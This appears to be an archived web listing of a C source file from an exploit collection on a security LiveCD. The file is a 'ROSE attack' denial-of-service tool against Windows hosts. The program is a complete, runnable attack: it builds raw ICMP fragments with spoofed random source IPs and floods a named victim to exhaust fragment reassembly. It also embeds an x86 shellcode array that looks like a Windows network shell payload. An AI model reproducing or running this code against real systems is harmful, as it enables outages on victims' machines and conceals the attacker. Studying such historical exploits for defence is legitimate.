Chip 2007 January, February, March & April

home *** CD-ROM | disk | FTP | other *** search

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / microsoft / remote / NewDawn2.c < prev next >

Wrap

C/C++ Source or Header | 2005-02-12 | 6.2 KB | 235 lines

/*** ROSE attack (chuck (at) lemure.net) Discovered by: gandalf@digital.net code modified from large IGMP attack by: Kox by Coolio (coolio@k-r4d.com) Sends out first and last ICMP packet echo request. Reportedly works for TCP / UDP as well, since this is a IP layer attack. Eats up all available packets for fragmentation reassembly. ***/ /* just a thousand kills win XP */ #define NUM_PACKETS 1000 #include <stdio.h> #include <unistd.h> #include <stdlib.h> #include <netdb.h> #include <string.h> #include <errno.h> #include <pwd.h> #include <time.h> #include <sys/types.h> #include <sys/socket.h> #include <sys/utsname.h> #include <netinet/in.h> #include <netinet/ip.h> #include <netinet/ip_icmp.h> #include <netinet/ip_icmp.h> /* Figured I try sending some shell code for my random payload... doesn't do anything */ char code[] = "\xe8\x38\x00\x00\x00\x43\x4d\x44\x00\xe7\x79\xc6\x79\xe5\x49\x86" "\x49\xa4\xad\x2e\xe9\xa4\x1a\x70\xc7\xd9\x09\xf5\xad\xcb\xed\xfc" "\x3b\x8e\x4e\x0e\xec\x7e\xd8\xe2\x73\xad\xd9\x05\xce\x72\xfe\xb3" "\x16\x57\x53\x32\x5f\x33\x32\x2e\x44\x4c\x4c\x00\x01\x5b\x54\x89" "\xe5\x89\x5d\x00\x6a\x30\x59\x64\x8b\x01\x8b\x40\x0c\x8b\x70\x1c" "\xad\x8b\x58\x08\xeb\x0c\x8d\x57\x2c\x51\x52\xff\xd0\x89\xc3\x59" "\xeb\x10\x6a\x08\x5e\x01\xee\x6a\x0a\x59\x8b\x7d\x00\x80\xf9\x06" "\x74\xe4\x51\x53\xff\x34\x8f\xe8\x90\x00\x00\x00\x59\x89\x04\x8e" "\xe2\xeb\x31\xff\x66\x81\xec\x90\x01\x54\x68\x01\x01\x00\x00\xff" "\x55\x20\x57\x57\x57\x57\x47\x57\x47\x57\xff\x55\x1c\x89\xc3\x31" "\xff\x57\x57\x68\x02\x00\x22\x11\x89\xe6\x6a\x10\x56\x53\xff\x55" "\x18\x57\x53\xff\x55\x14\x57\x56\x53\xff\x55\x10\x89\xc2\x66\x81" "\xec\x54\x00\x8d\x3c\x24\x31\xc0\x6a\x15\x59\xf3\xab\x89\xd7\xc6" "\x44\x24\x10\x44\xfe\x44\x24\x3d\x89\x7c\x24\x48\x89\x7c\x24\x4c" "\x89\x7c\x24\x50\x8d\x44\x24\x10\x54\x50\x51\x51\x51\x41\x51\x49" "\x51\x51\xff\x75\x00\x51\xff\x55\x30\x89\xe1\x68\xff\xff\xff\xff" "\xff\x31\xff\x55\x2c\x57\xff\x55\x0c\xff\x55\x28\x53\x55\x56\x57" "\x8b\x6c\x24\x18\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18" "\x8b\x5a\x20\x01\xeb\xe3\x32\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc" "\x31\xc0\xac\x38\xe0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c" "\x24\x14\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c" "\x01\xeb\x8b\x04\x8b\x01\xe8\xeb\x02\x31\xc0\x89\xea\x5f\x5e\x5d" "\x5b\xc2\x08\x00"; void usage(char *arg) { printf("Rose attack\n"); printf("Usage: %s <victim> [source]\n", arg); printf("If source not specified, will send out from random ip's\n"); exit(1); } unsigned int randip() { struct hostent *he; struct sockaddr_in sin; char *buf = (char *)calloc(1, sizeof(char) * 16); sprintf(buf, "%d.%d.%d.%d", (random()%191)+23, (random()%253)+1, (random()%253)+1, (random()%253)+1); return inet_addr(buf); } unsigned short in_cksum(unsigned short *buh, int len) { register long sum = 0; unsigned short oddbyte; register unsigned short answer; while(len > 1) { sum += *buh++; len -= 2; } if(len == 1) { oddbyte = 0; *((unsigned char *)&oddbyte) = *(unsigned char *)buh; sum += oddbyte; } sum = (sum >> 16) + (sum & 0xFFFF); sum += (sum >> 16); answer = ~sum; return answer; } int rose(struct sockaddr_in *victim, unsigned long src) { int SMALLICMP = 1000; unsigned char *pkt; struct iphdr *ip; struct igmphdr *igmp; struct icmphdr *icmp_pkt; struct utsname *un; struct passwd *p; int i, s,j; int id = (random() % 40000) + 500; pkt = (unsigned char *)calloc(1, SMALLICMP); ip = (struct iphdr *)pkt; icmp_pkt = (struct icmphdr *)(pkt + sizeof(struct iphdr)); ip->version = 4; ip->ihl = (sizeof *ip) / 4; ip->ttl = 255; ip->tot_len = htons(SMALLICMP); ip->protocol = 1; ip->id = htons(id); ip->frag_off = htons(IP_MF); ip->saddr = src; ip->daddr = victim->sin_addr.s_addr; ip->check = in_cksum((unsigned short *)ip, sizeof(struct iphdr)); icmp_pkt->type = ICMP_ECHO; icmp_pkt->code = 0; icmp_pkt->checksum = 1000; icmp_pkt->un.echo.id = random() % 255; icmp_pkt->un.echo.sequence = random() % 255; for(i = sizeof(struct iphdr) + sizeof(struct icmphdr) + 1; i < SMALLICMP; i++){ //pkt[i] = random() % 255; pkt[i] = '\x00'; } j=0; for (i=sizeof(struct iphdr) + sizeof(struct icmphdr) + 500; i < sizeof(struct iphdr) + sizeof(struct icmphdr) + 500 + 356; i++){ pkt[i] = code[j]; j++; } if((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { perror("error: socket()"); return 1; } if(sendto(s, pkt, SMALLICMP, 0, (struct sockaddr *)victim, sizeof(struct sockaddr_in)) == -1) { perror("error: sendto()"); return 1; } /* big frag at end... */ ip->frag_off = htons(8100); //ip->frag_off = htons(8100 | IP_MF); sendto(s, pkt, SMALLICMP, 0, (struct sockaddr *)victim, sizeof(struct sockaddr_in)); free(pkt); close(s); usleep(1000); return 0; } int main(int argc, char *argv[]) { struct sockaddr_in victim; struct hostent *he; unsigned long source; int i; srandom(time(NULL)); if(argc < 2) usage(argv[0]); if((he = gethostbyname(argv[1])) == NULL) { herror(argv[1]); exit(1); } if (argc > 2){ source = inet_addr(argv[2]); } else { source = randip(); } memcpy(&victim.sin_addr.s_addr, he->h_addr, he->h_length); victim.sin_port = htons(0); victim.sin_family = PF_INET; printf("Sending ICMP fragments: "); fflush(stdout); for(i = 0; i < NUM_PACKETS; i++) { rose(&victim, source); if (argc < 3){ source = randip(); } printf("%d\n", i); fflush(stdout); } printf("\nDONE\n"); fflush(stdout); }